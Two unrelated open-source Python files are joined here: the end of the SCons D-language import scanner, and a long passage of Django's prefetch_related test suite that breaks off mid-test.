# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Scanner/D.py 5023 2010/06/14 22:05:46 scons"
import re
import SCons.Scanner
def DScanner():
"""Return a prototype Scanner instance for scanning D source files"""
ds = D()
return ds
class D(SCons.Scanner.Classic):
def __init__ (self):
SCons.Scanner.Classic.__init__ (self,
name = "DScanner",
suffixes = '$DSUFFIXES',
path_variable = 'DPATH',
regex = 'import\s+(?:[a-zA-Z0-9_.]+)\s*(?:,\s*(?:[a-zA-Z0-9_.]+)\s*)*;')
self.cre2 = re.compile ('(?:import\s)?\s*([a-zA-Z0-9_.]+)\s*(?:,|;)', re.M)
def find_include(self, include, source_dir, path):
# translate dots (package separators) to slashes
inc = include.replace('.', '/')
i = SCons.Node.FS.find_file(inc + '.d', (source_dir,) + path)
if i is None:
i = SCons.Node.FS.find_file (inc + '.di', (source_dir,) + path)
return i, include
def find_include_names(self, node):
includes = []
for i in self.cre.findall(node.get_text_contents()):
includes = includes + self.cre2.findall(i)
return includes
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_106_12990
|
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.db import connection
from django.db.models import Prefetch, QuerySet
from django.db.models.query import get_prefetcher, prefetch_related_objects
from django.test import TestCase, override_settings
from django.test.utils import CaptureQueriesContext
from .models import (
Author, Author2, AuthorAddress, AuthorWithAge, Bio, Book, Bookmark,
BookReview, BookWithYear, Comment, Department, Employee, FavoriteAuthors,
House, LessonEntry, ModelIterableSubclass, Person, Qualification, Reader,
Room, TaggedItem, Teacher, WordEntry,
)
class TestDataMixin:
@classmethod
def setUpTestData(cls):
cls.book1 = Book.objects.create(title='Poems')
cls.book2 = Book.objects.create(title='Jane Eyre')
cls.book3 = Book.objects.create(title='Wuthering Heights')
cls.book4 = Book.objects.create(title='Sense and Sensibility')
cls.author1 = Author.objects.create(name='Charlotte', first_book=cls.book1)
cls.author2 = Author.objects.create(name='Anne', first_book=cls.book1)
cls.author3 = Author.objects.create(name='Emily', first_book=cls.book1)
cls.author4 = Author.objects.create(name='Jane', first_book=cls.book4)
cls.book1.authors.add(cls.author1, cls.author2, cls.author3)
cls.book2.authors.add(cls.author1)
cls.book3.authors.add(cls.author3)
cls.book4.authors.add(cls.author4)
cls.reader1 = Reader.objects.create(name='Amy')
cls.reader2 = Reader.objects.create(name='Belinda')
cls.reader1.books_read.add(cls.book1, cls.book4)
cls.reader2.books_read.add(cls.book2, cls.book4)
class PrefetchRelatedTests(TestDataMixin, TestCase):
def assertWhereContains(self, sql, needle):
where_idx = sql.index('WHERE')
self.assertEqual(
sql.count(str(needle), where_idx), 1,
msg="WHERE clause doesn't contain %s, actual SQL: %s" % (needle, sql[where_idx:])
)
def test_m2m_forward(self):
with self.assertNumQueries(2):
lists = [list(b.authors.all()) for b in Book.objects.prefetch_related('authors')]
normal_lists = [list(b.authors.all()) for b in Book.objects.all()]
self.assertEqual(lists, normal_lists)
def test_m2m_reverse(self):
with self.assertNumQueries(2):
lists = [list(a.books.all()) for a in Author.objects.prefetch_related('books')]
normal_lists = [list(a.books.all()) for a in Author.objects.all()]
self.assertEqual(lists, normal_lists)
def test_foreignkey_forward(self):
with self.assertNumQueries(2):
books = [a.first_book for a in Author.objects.prefetch_related('first_book')]
normal_books = [a.first_book for a in Author.objects.all()]
self.assertEqual(books, normal_books)
def test_foreignkey_reverse(self):
with self.assertNumQueries(2):
[list(b.first_time_authors.all())
for b in Book.objects.prefetch_related('first_time_authors')]
self.assertQuerysetEqual(self.book2.authors.all(), ["<Author: Charlotte>"])
def test_onetoone_reverse_no_match(self):
# Regression for #17439
with self.assertNumQueries(2):
book = Book.objects.prefetch_related('bookwithyear').all()[0]
with self.assertNumQueries(0):
with self.assertRaises(BookWithYear.DoesNotExist):
book.bookwithyear
def test_onetoone_reverse_with_to_field_pk(self):
"""
A model (Bio) with a OneToOneField primary key (author) that references
a non-pk field (name) on the related model (Author) is prefetchable.
"""
Bio.objects.bulk_create([
Bio(author=self.author1),
Bio(author=self.author2),
Bio(author=self.author3),
])
authors = Author.objects.filter(
name__in=[self.author1, self.author2, self.author3],
).prefetch_related('bio')
with self.assertNumQueries(2):
for author in authors:
self.assertEqual(author.name, author.bio.author.name)
def test_survives_clone(self):
with self.assertNumQueries(2):
[list(b.first_time_authors.all())
for b in Book.objects.prefetch_related('first_time_authors').exclude(id=1000)]
def test_len(self):
with self.assertNumQueries(2):
qs = Book.objects.prefetch_related('first_time_authors')
len(qs)
[list(b.first_time_authors.all()) for b in qs]
def test_bool(self):
with self.assertNumQueries(2):
qs = Book.objects.prefetch_related('first_time_authors')
bool(qs)
[list(b.first_time_authors.all()) for b in qs]
def test_count(self):
with self.assertNumQueries(2):
qs = Book.objects.prefetch_related('first_time_authors')
[b.first_time_authors.count() for b in qs]
def test_exists(self):
with self.assertNumQueries(2):
qs = Book.objects.prefetch_related('first_time_authors')
[b.first_time_authors.exists() for b in qs]
def test_in_and_prefetch_related(self):
"""
Regression test for #20242 - QuerySet "in" didn't work the first time
when using prefetch_related. This was fixed by the removal of chunked
reads from QuerySet iteration in
70679243d1786e03557c28929f9762a119e3ac14.
"""
qs = Book.objects.prefetch_related('first_time_authors')
self.assertIn(qs[0], qs)
def test_clear(self):
with self.assertNumQueries(5):
with_prefetch = Author.objects.prefetch_related('books')
without_prefetch = with_prefetch.prefetch_related(None)
[list(a.books.all()) for a in without_prefetch]
def test_m2m_then_m2m(self):
"""A m2m can be followed through another m2m."""
with self.assertNumQueries(3):
qs = Author.objects.prefetch_related('books__read_by')
lists = [[[str(r) for r in b.read_by.all()]
for b in a.books.all()]
for a in qs]
self.assertEqual(lists, [
[["Amy"], ["Belinda"]], # Charlotte - Poems, Jane Eyre
[["Amy"]], # Anne - Poems
[["Amy"], []], # Emily - Poems, Wuthering Heights
[["Amy", "Belinda"]], # Jane - Sense and Sense
])
def test_overriding_prefetch(self):
with self.assertNumQueries(3):
qs = Author.objects.prefetch_related('books', 'books__read_by')
lists = [[[str(r) for r in b.read_by.all()]
for b in a.books.all()]
for a in qs]
self.assertEqual(lists, [
[["Amy"], ["Belinda"]], # Charlotte - Poems, Jane Eyre
[["Amy"]], # Anne - Poems
[["Amy"], []], # Emily - Poems, Wuthering Heights
[["Amy", "Belinda"]], # Jane - Sense and Sense
])
with self.assertNumQueries(3):
qs = Author.objects.prefetch_related('books__read_by', 'books')
lists = [[[str(r) for r in b.read_by.all()]
for b in a.books.all()]
for a in qs]
self.assertEqual(lists, [
[["Amy"], ["Belinda"]], # Charlotte - Poems, Jane Eyre
[["Amy"]], # Anne - Poems
[["Amy"], []], # Emily - Poems, Wuthering Heights
[["Amy", "Belinda"]], # Jane - Sense and Sense
])
def test_get(self):
"""
Objects retrieved with .get() get the prefetch behavior.
"""
# Need a double
with self.assertNumQueries(3):
author = Author.objects.prefetch_related('books__read_by').get(name="Charlotte")
lists = [[str(r) for r in b.read_by.all()] for b in author.books.all()]
self.assertEqual(lists, [["Amy"], ["Belinda"]]) # Poems, Jane Eyre
def test_foreign_key_then_m2m(self):
"""
A m2m relation can be followed after a relation like ForeignKey that
doesn't have many objects.
"""
with self.assertNumQueries(2):
qs = Author.objects.select_related('first_book').prefetch_related('first_book__read_by')
lists = [[str(r) for r in a.first_book.read_by.all()]
for a in qs]
self.assertEqual(lists, [["Amy"], ["Amy"], ["Amy"], ["Amy", "Belinda"]])
def test_reverse_one_to_one_then_m2m(self):
"""
A m2m relation can be followed afterr going through the select_related
reverse of an o2o.
"""
qs = Author.objects.prefetch_related('bio__books').select_related('bio')
with self.assertNumQueries(1):
list(qs.all())
Bio.objects.create(author=self.author1)
with self.assertNumQueries(2):
list(qs.all())
def test_attribute_error(self):
qs = Reader.objects.all().prefetch_related('books_read__xyz')
msg = (
"Cannot find 'xyz' on Book object, 'books_read__xyz' "
"is an invalid parameter to prefetch_related()"
)
with self.assertRaisesMessage(AttributeError, msg) as cm:
list(qs)
self.assertIn('prefetch_related', str(cm.exception))
def test_invalid_final_lookup(self):
qs = Book.objects.prefetch_related('authors__name')
msg = (
"'authors__name' does not resolve to an item that supports "
"prefetching - this is an invalid parameter to prefetch_related()."
)
with self.assertRaisesMessage(ValueError, msg) as cm:
list(qs)
self.assertIn('prefetch_related', str(cm.exception))
self.assertIn("name", str(cm.exception))
def test_forward_m2m_to_attr_conflict(self):
msg = 'to_attr=authors conflicts with a field on the Book model.'
authors = Author.objects.all()
with self.assertRaisesMessage(ValueError, msg):
list(Book.objects.prefetch_related(
Prefetch('authors', queryset=authors, to_attr='authors'),
))
# Without the ValueError, an author was deleted due to the implicit
# save of the relation assignment.
self.assertEqual(self.book1.authors.count(), 3)
def test_reverse_m2m_to_attr_conflict(self):
msg = 'to_attr=books conflicts with a field on the Author model.'
poems = Book.objects.filter(title='Poems')
with self.assertRaisesMessage(ValueError, msg):
list(Author.objects.prefetch_related(
Prefetch('books', queryset=poems, to_attr='books'),
))
# Without the ValueError, a book was deleted due to the implicit
# save of reverse relation assignment.
self.assertEqual(self.author1.books.count(), 2)
def test_m2m_then_reverse_fk_object_ids(self):
with CaptureQueriesContext(connection) as queries:
list(Book.objects.prefetch_related('authors__addresses'))
sql = queries[-1]['sql']
self.assertWhereContains(sql, self.author1.name)
def test_m2m_then_m2m_object_ids(self):
with CaptureQueriesContext(connection) as queries:
list(Book.objects.prefetch_related('authors__favorite_authors'))
sql = queries[-1]['sql']
self.assertWhereContains(sql, self.author1.name)
def test_m2m_then_reverse_one_to_one_object_ids(self):
with CaptureQueriesContext(connection) as queries:
list(Book.objects.prefetch_related('authors__authorwithage'))
sql = queries[-1]['sql']
self.assertWhereContains(sql, self.author1.id)
class RawQuerySetTests(TestDataMixin, TestCase):
def test_basic(self):
with self.assertNumQueries(2):
books = Book.objects.raw(
"SELECT * FROM prefetch_related_book WHERE id = %s",
(self.book1.id,)
).prefetch_related('authors')
book1 = list(books)[0]
with self.assertNumQueries(0):
self.assertCountEqual(book1.authors.all(), [self.author1, self.author2, self.author3])
def test_prefetch_before_raw(self):
with self.assertNumQueries(2):
books = Book.objects.prefetch_related('authors').raw(
"SELECT * FROM prefetch_related_book WHERE id = %s",
(self.book1.id,)
)
book1 = list(books)[0]
with self.assertNumQueries(0):
self.assertCountEqual(book1.authors.all(), [self.author1, self.author2, self.author3])
def test_clear(self):
with self.assertNumQueries(5):
with_prefetch = Author.objects.raw(
"SELECT * FROM prefetch_related_author"
).prefetch_related('books')
without_prefetch = with_prefetch.prefetch_related(None)
[list(a.books.all()) for a in without_prefetch]
class CustomPrefetchTests(TestCase):
@classmethod
def traverse_qs(cls, obj_iter, path):
"""
Helper method that returns a list containing a list of the objects in the
obj_iter. Then for each object in the obj_iter, the path will be
recursively travelled and the found objects are added to the return value.
"""
ret_val = []
if hasattr(obj_iter, 'all'):
obj_iter = obj_iter.all()
try:
iter(obj_iter)
except TypeError:
obj_iter = [obj_iter]
for obj in obj_iter:
rel_objs = []
for part in path:
if not part:
continue
try:
related = getattr(obj, part[0])
except ObjectDoesNotExist:
continue
if related is not None:
rel_objs.extend(cls.traverse_qs(related, [part[1:]]))
ret_val.append((obj, rel_objs))
return ret_val
@classmethod
def setUpTestData(cls):
cls.person1 = Person.objects.create(name='Joe')
cls.person2 = Person.objects.create(name='Mary')
# Set main_room for each house before creating the next one for
# databases where supports_nullable_unique_constraints is False.
cls.house1 = House.objects.create(name='House 1', address='123 Main St', owner=cls.person1)
cls.room1_1 = Room.objects.create(name='Dining room', house=cls.house1)
cls.room1_2 = Room.objects.create(name='Lounge', house=cls.house1)
cls.room1_3 = Room.objects.create(name='Kitchen', house=cls.house1)
cls.house1.main_room = cls.room1_1
cls.house1.save()
cls.person1.houses.add(cls.house1)
cls.house2 = House.objects.create(name='House 2', address='45 Side St', owner=cls.person1)
cls.room2_1 = Room.objects.create(name='Dining room', house=cls.house2)
cls.room2_2 = Room.objects.create(name='Lounge', house=cls.house2)
cls.room2_3 = Room.objects.create(name='Kitchen', house=cls.house2)
cls.house2.main_room = cls.room2_1
cls.house2.save()
cls.person1.houses.add(cls.house2)
cls.house3 = House.objects.create(name='House 3', address='6 Downing St', owner=cls.person2)
cls.room3_1 = Room.objects.create(name='Dining room', house=cls.house3)
cls.room3_2 = Room.objects.create(name='Lounge', house=cls.house3)
cls.room3_3 = Room.objects.create(name='Kitchen', house=cls.house3)
cls.house3.main_room = cls.room3_1
cls.house3.save()
cls.person2.houses.add(cls.house3)
cls.house4 = House.objects.create(name='house 4', address="7 Regents St", owner=cls.person2)
cls.room4_1 = Room.objects.create(name='Dining room', house=cls.house4)
cls.room4_2 = Room.objects.create(name='Lounge', house=cls.house4)
cls.room4_3 = Room.objects.create(name='Kitchen', house=cls.house4)
cls.house4.main_room = cls.room4_1
cls.house4.save()
cls.person2.houses.add(cls.house4)
def test_traverse_qs(self):
qs = Person.objects.prefetch_related('houses')
related_objs_normal = [list(p.houses.all()) for p in qs],
related_objs_from_traverse = [[inner[0] for inner in o[1]]
for o in self.traverse_qs(qs, [['houses']])]
self.assertEqual(related_objs_normal, (related_objs_from_traverse,))
def test_ambiguous(self):
# Ambiguous: Lookup was already seen with a different queryset.
msg = (
"'houses' lookup was already seen with a different queryset. You "
"may need to adjust the ordering of your lookups."
)
with self.assertRaisesMessage(ValueError, msg):
self.traverse_qs(
Person.objects.prefetch_related('houses__rooms', Prefetch('houses', queryset=House.objects.all())),
[['houses', 'rooms']]
)
# Ambiguous: Lookup houses_lst doesn't yet exist when performing houses_lst__rooms.
msg = (
"Cannot find 'houses_lst' on Person object, 'houses_lst__rooms' is "
"an invalid parameter to prefetch_related()"
)
with self.assertRaisesMessage(AttributeError, msg):
self.traverse_qs(
Person.objects.prefetch_related(
'houses_lst__rooms',
Prefetch('houses', queryset=House.objects.all(), to_attr='houses_lst')
),
[['houses', 'rooms']]
)
# Not ambiguous.
self.traverse_qs(
Person.objects.prefetch_related('houses__rooms', 'houses'),
[['houses', 'rooms']]
)
self.traverse_qs(
Person.objects.prefetch_related(
'houses__rooms',
Prefetch('houses', queryset=House.objects.all(), to_attr='houses_lst')
),
[['houses', 'rooms']]
)
def test_m2m(self):
# Control lookups.
with self.assertNumQueries(2):
lst1 = self.traverse_qs(
Person.objects.prefetch_related('houses'),
[['houses']]
)
# Test lookups.
with self.assertNumQueries(2):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses')),
[['houses']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(2):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses', to_attr='houses_lst')),
[['houses_lst']]
)
self.assertEqual(lst1, lst2)
def test_reverse_m2m(self):
# Control lookups.
with self.assertNumQueries(2):
lst1 = self.traverse_qs(
House.objects.prefetch_related('occupants'),
[['occupants']]
)
# Test lookups.
with self.assertNumQueries(2):
lst2 = self.traverse_qs(
House.objects.prefetch_related(Prefetch('occupants')),
[['occupants']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(2):
lst2 = self.traverse_qs(
House.objects.prefetch_related(Prefetch('occupants', to_attr='occupants_lst')),
[['occupants_lst']]
)
self.assertEqual(lst1, lst2)
def test_m2m_through_fk(self):
# Control lookups.
with self.assertNumQueries(3):
lst1 = self.traverse_qs(
Room.objects.prefetch_related('house__occupants'),
[['house', 'occupants']]
)
# Test lookups.
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Room.objects.prefetch_related(Prefetch('house__occupants')),
[['house', 'occupants']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Room.objects.prefetch_related(Prefetch('house__occupants', to_attr='occupants_lst')),
[['house', 'occupants_lst']]
)
self.assertEqual(lst1, lst2)
def test_m2m_through_gfk(self):
TaggedItem.objects.create(tag="houses", content_object=self.house1)
TaggedItem.objects.create(tag="houses", content_object=self.house2)
# Control lookups.
with self.assertNumQueries(3):
lst1 = self.traverse_qs(
TaggedItem.objects.filter(tag='houses').prefetch_related('content_object__rooms'),
[['content_object', 'rooms']]
)
# Test lookups.
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
TaggedItem.objects.prefetch_related(
Prefetch('content_object'),
Prefetch('content_object__rooms', to_attr='rooms_lst')
),
[['content_object', 'rooms_lst']]
)
self.assertEqual(lst1, lst2)
def test_o2m_through_m2m(self):
# Control lookups.
with self.assertNumQueries(3):
lst1 = self.traverse_qs(
Person.objects.prefetch_related('houses', 'houses__rooms'),
[['houses', 'rooms']]
)
# Test lookups.
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses'), 'houses__rooms'),
[['houses', 'rooms']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses'), Prefetch('houses__rooms')),
[['houses', 'rooms']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses', to_attr='houses_lst'), 'houses_lst__rooms'),
[['houses_lst', 'rooms']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(
Prefetch('houses', to_attr='houses_lst'),
Prefetch('houses_lst__rooms', to_attr='rooms_lst')
),
[['houses_lst', 'rooms_lst']]
)
self.assertEqual(lst1, lst2)
def test_generic_rel(self):
bookmark = Bookmark.objects.create(url='http://www.djangoproject.com/')
TaggedItem.objects.create(content_object=bookmark, tag='django')
TaggedItem.objects.create(content_object=bookmark, favorite=bookmark, tag='python')
# Control lookups.
with self.assertNumQueries(4):
lst1 = self.traverse_qs(
Bookmark.objects.prefetch_related('tags', 'tags__content_object', 'favorite_tags'),
[['tags', 'content_object'], ['favorite_tags']]
)
# Test lookups.
with self.assertNumQueries(4):
lst2 = self.traverse_qs(
Bookmark.objects.prefetch_related(
Prefetch('tags', to_attr='tags_lst'),
Prefetch('tags_lst__content_object'),
Prefetch('favorite_tags'),
),
[['tags_lst', 'content_object'], ['favorite_tags']]
)
self.assertEqual(lst1, lst2)
def test_traverse_single_item_property(self):
# Control lookups.
with self.assertNumQueries(5):
lst1 = self.traverse_qs(
Person.objects.prefetch_related(
'houses__rooms',
'primary_house__occupants__houses',
),
[['primary_house', 'occupants', 'houses']]
)
# Test lookups.
with self.assertNumQueries(5):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(
'houses__rooms',
Prefetch('primary_house__occupants', to_attr='occupants_lst'),
'primary_house__occupants_lst__houses',
),
[['primary_house', 'occupants_lst', 'houses']]
)
self.assertEqual(lst1, lst2)
def test_traverse_multiple_items_property(self):
# Control lookups.
with self.assertNumQueries(4):
lst1 = self.traverse_qs(
Person.objects.prefetch_related(
'houses',
'all_houses__occupants__houses',
),
[['all_houses', 'occupants', 'houses']]
)
# Test lookups.
with self.assertNumQueries(4):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(
'houses',
Prefetch('all_houses__occupants', to_attr='occupants_lst'),
'all_houses__occupants_lst__houses',
),
[['all_houses', 'occupants_lst', 'houses']]
)
self.assertEqual(lst1, lst2)
def test_custom_qs(self):
# Test basic.
with self.assertNumQueries(2):
lst1 = list(Person.objects.prefetch_related('houses'))
with self.assertNumQueries(2):
lst2 = list(Person.objects.prefetch_related(
Prefetch('houses', queryset=House.objects.all(), to_attr='houses_lst')))
self.assertEqual(
self.traverse_qs(lst1, [['houses']]),
self.traverse_qs(lst2, [['houses_lst']])
)
# Test queryset filtering.
with self.assertNumQueries(2):
lst2 = list(
Person.objects.prefetch_related(
Prefetch(
'houses',
queryset=House.objects.filter(pk__in=[self.house1.pk, self.house3.pk]),
to_attr='houses_lst',
)
)
)
self.assertEqual(len(lst2[0].houses_lst), 1)
self.assertEqual(lst2[0].houses_lst[0], self.house1)
self.assertEqual(len(lst2[1].houses_lst), 1)
self.assertEqual(lst2[1].houses_lst[0], self.house3)
# Test flattened.
with self.assertNumQueries(3):
lst1 = list(Person.objects.prefetch_related('houses__rooms'))
with self.assertNumQueries(3):
lst2 = list(Person.objects.prefetch_related(
Prefetch('houses__rooms', queryset=Room.objects.all(), to_attr='rooms_lst')))
self.assertEqual(
self.traverse_qs(lst1, [['houses', 'rooms']]),
self.traverse_qs(lst2, [['houses', 'rooms_lst']])
)
# Test inner select_related.
with self.assertNumQueries(3):
lst1 = list(Person.objects.prefetch_related('houses__owner'))
with self.assertNumQueries(2):
lst2 = list(Person.objects.prefetch_related(
Prefetch('houses', queryset=House.objects.select_related('owner'))))
self.assertEqual(
self.traverse_qs(lst1, [['houses', 'owner']]),
self.traverse_qs(lst2, [['houses', 'owner']])
)
# Test inner prefetch.
inner_rooms_qs = Room.objects.filter(pk__in=[self.room1_1.pk, self.room1_2.pk])
houses_qs_prf = House.objects.prefetch_related(
Prefetch('rooms', queryset=inner_rooms_qs, to_attr='rooms_lst'))
with self.assertNumQueries(4):
lst2 = list(Person.objects.prefetch_related(
Prefetch('houses', queryset=houses_qs_prf.filter(pk=self.house1.pk), to_attr='houses_lst'),
Prefetch('houses_lst__rooms_lst__main_room_of')
))
self.assertEqual(len(lst2[0].houses_lst[0].rooms_lst), 2)
self.assertEqual(lst2[0].houses_lst[0].rooms_lst[0], self.room1_1)
self.assertEqual(lst2[0].houses_lst[0].rooms_lst[1], self.room1_2)
self.assertEqual(lst2[0].houses_lst[0].rooms_lst[0].main_room_of, self.house1)
self.assertEqual(len(lst2[1].houses_lst), 0)
# Test ForwardManyToOneDescriptor.
houses = House.objects.select_related('owner')
with self.assertNumQueries(6):
rooms = Room.objects.all().prefetch_related('house')
lst1 = self.traverse_qs(rooms, [['house', 'owner']])
with self.assertNumQueries(2):
rooms = Room.objects.all().prefetch_related(Prefetch('house', queryset=houses.all()))
lst2 = self.traverse_qs(rooms, [['house', 'owner']])
self.assertEqual(lst1, lst2)
with self.assertNumQueries(2):
houses = House.objects.select_related('owner')
rooms = Room.objects.all().prefetch_related(Prefetch('house', queryset=houses.all(), to_attr='house_attr'))
lst2 = self.traverse_qs(rooms, [['house_attr', 'owner']])
self.assertEqual(lst1, lst2)
room = Room.objects.all().prefetch_related(
Prefetch('house', queryset=houses.filter(address='DoesNotExist'))
).first()
with self.assertRaises(ObjectDoesNotExist):
getattr(room, 'house')
room = Room.objects.all().prefetch_related(
Prefetch('house', queryset=houses.filter(address='DoesNotExist'), to_attr='house_attr')
).first()
self.assertIsNone(room.house_attr)
rooms = Room.objects.all().prefetch_related(Prefetch('house', queryset=House.objects.only('name')))
with self.assertNumQueries(2):
getattr(rooms.first().house, 'name')
with self.assertNumQueries(3):
getattr(rooms.first().house, 'address')
# Test ReverseOneToOneDescriptor.
houses = House.objects.select_related('owner')
with self.assertNumQueries(6):
rooms = Room.objects.all().prefetch_related('main_room_of')
lst1 = self.traverse_qs(rooms, [['main_room_of', 'owner']])
with self.assertNumQueries(2):
rooms = Room.objects.all().prefetch_related(Prefetch('main_room_of', queryset=houses.all()))
lst2 = self.traverse_qs(rooms, [['main_room_of', 'owner']])
self.assertEqual(lst1, lst2)
with self.assertNumQueries(2):
rooms = list(
Room.objects.all().prefetch_related(
Prefetch('main_room_of', queryset=houses.all(), to_attr='main_room_of_attr')
)
)
lst2 = self.traverse_qs(rooms, [['main_room_of_attr', 'owner']])
self.assertEqual(lst1, lst2)
room = Room.objects.filter(main_room_of__isnull=False).prefetch_related(
Prefetch('main_room_of', queryset=houses.filter(address='DoesNotExist'))
).first()
with self.assertRaises(ObjectDoesNotExist):
getattr(room, 'main_room_of')
room = Room.objects.filter(main_room_of__isnull=False).prefetch_related(
Prefetch('main_room_of', queryset=houses.filter(address='DoesNotExist'), to_attr='main_room_of_attr')
).first()
self.assertIsNone(room.main_room_of_attr)
# The custom queryset filters should be applied to the queryset
# instance returned by the manager.
person = Person.objects.prefetch_related(
Prefetch('houses', queryset=House.objects.filter(name='House 1')),
).get(pk=self.person1.pk)
self.assertEqual(
list(person.houses.all()),
list(person.houses.all().all()),
)
def test_nested_prefetch_related_are_not_overwritten(self):
# Regression test for #24873
houses_2 = House.objects.prefetch_related(Prefetch('rooms'))
persons = Person.objects.prefetch_related(Prefetch('houses', queryset=houses_2))
houses = House.objects.prefetch_related(Prefetch('occupants', queryset=persons))
list(houses) # queryset must be evaluated once to reproduce the bug.
self.assertEqual(
houses.all()[0].occupants.all()[0].houses.all()[1].rooms.all()[0],
self.room2_1
)
def test_nested_prefetch_related_with_duplicate_prefetcher(self):
"""
Nested prefetches whose name clashes with descriptor names
(Person.houses here) are allowed.
"""
occupants = Person.objects.prefetch_related(
Prefetch('houses', to_attr='some_attr_name'),
Prefetch('houses', queryset=House.objects.prefetch_related('main_room')),
)
houses = House.objects.prefetch_related(Prefetch('occupants', queryset=occupants))
with self.assertNumQueries(5):
self.traverse_qs(list(houses), [['occupants', 'houses', 'main_room']])
def test_values_queryset(self):
with self.assertRaisesMessage(ValueError, 'Prefetch querysets cannot use values().'):
Prefetch('houses', House.objects.values('pk'))
# That error doesn't affect managers with custom ModelIterable subclasses
self.assertIs(Teacher.objects_custom.all()._iterable_class, ModelIterableSubclass)
Prefetch('teachers', Teacher.objects_custom.all())
def test_to_attr_doesnt_cache_through_attr_as_list(self):
house = House.objects.prefetch_related(
Prefetch('rooms', queryset=Room.objects.all(), to_attr='to_rooms'),
).get(pk=self.house3.pk)
self.assertIsInstance(house.rooms.all(), QuerySet)
def test_to_attr_cached_property(self):
persons = Person.objects.prefetch_related(
Prefetch('houses', House.objects.all(), to_attr='cached_all_houses'),
)
for person in persons:
# To bypass caching at the related descriptor level, don't use
# person.houses.all() here.
all_houses = list(House.objects.filter(occupants=person))
with self.assertNumQueries(0):
self.assertEqual(person.cached_all_houses, all_houses)
class DefaultManagerTests(TestCase):
def setUp(self):
self.qual1 = Qualification.objects.create(name="BA")
self.qual2 = Qualification.objects.create(name="BSci")
self.qual3 = Qualification.objects.create(name="MA")
self.qual4 = Qualification.objects.create(name="PhD")
self.teacher1 = Teacher.objects.create(name="Mr Cleese")
self.teacher2 = Teacher.objects.create(name="Mr Idle")
self.teacher3 = Teacher.objects.create(name="Mr Chapman")
self.teacher1.qualifications.add(self.qual1, self.qual2, self.qual3, self.qual4)
self.teacher2.qualifications.add(self.qual1)
self.teacher3.qualifications.add(self.qual2)
self.dept1 = Department.objects.create(name="English")
self.dept2 = Department.objects.create(name="Physics")
self.dept1.teachers.add(self.teacher1, self.teacher2)
self.dept2.teachers.add(self.teacher1, self.teacher3)
def test_m2m_then_m2m(self):
with self.assertNumQueries(3):
# When we prefetch the teachers, and force the query, we don't want
# the default manager on teachers to immediately get all the related
# qualifications, since this will do one query per teacher.
qs = Department.objects.prefetch_related('teachers')
depts = "".join("%s department: %s\n" %
(dept.name, ", ".join(str(t) for t in dept.teachers.all()))
for dept in qs)
self.assertEqual(depts,
"English department: Mr Cleese (BA, BSci, MA, PhD), Mr Idle (BA)\n"
"Physics department: Mr Cleese (BA, BSci, MA, PhD), Mr Chapman (BSci)\n")
class GenericRelationTests(TestCase):
@classmethod
def setUpTestData(cls):
book1 = Book.objects.create(title="Winnie the Pooh")
book2 = Book.objects.create(title="Do you like green eggs and spam?")
book3 = Book.objects.create(title="Three Men In A Boat")
reader1 = Reader.objects.create(name="me")
reader2 = Reader.objects.create(name="you")
reader3 = Reader.objects.create(name="someone")
book1.read_by.add(reader1, reader2)
book2.read_by.add(reader2)
book3.read_by.add(reader3)
cls.book1, cls.book2, cls.book3 = book1, book2, book3
cls.reader1, cls.reader2, cls.reader3 = reader1, reader2, reader3
def test_prefetch_GFK(self):
TaggedItem.objects.create(tag="awesome", content_object=self.book1)
TaggedItem.objects.create(tag="great", content_object=self.reader1)
TaggedItem.objects.create(tag="outstanding", content_object=self.book2)
TaggedItem.objects.create(tag="amazing", content_object=self.reader3)
# 1 for TaggedItem table, 1 for Book table, 1 for Reader table
with self.assertNumQueries(3):
qs = TaggedItem.objects.prefetch_related('content_object')
list(qs)
def test_prefetch_GFK_nonint_pk(self):
Comment.objects.create(comment="awesome", content_object=self.book1)
# 1 for Comment table, 1 for Book table
with self.assertNumQueries(2):
qs = Comment.objects.prefetch_related('content_object')
[c.content_object for c in qs]
def test_traverse_GFK(self):
"""
A 'content_object' can be traversed with prefetch_related() and
get to related objects on the other side (assuming it is suitably
filtered)
"""
TaggedItem.objects.create(tag="awesome", content_object=self.book1)
TaggedItem.objects.create(tag="awesome", content_object=self.book2)
TaggedItem.objects.create(tag="awesome", content_object=self.book3)
TaggedItem.objects.create(tag="awesome", content_object=self.reader1)
TaggedItem.objects.create(tag="awesome", content_object=self.reader2)
ct = ContentType.objects.get_for_model(Book)
# We get 3 queries - 1 for main query, 1 for content_objects since they
# all use the same table, and 1 for the 'read_by' relation.
with self.assertNumQueries(3):
# If we limit to books, we know that they will have 'read_by'
# attributes, so the following makes sense:
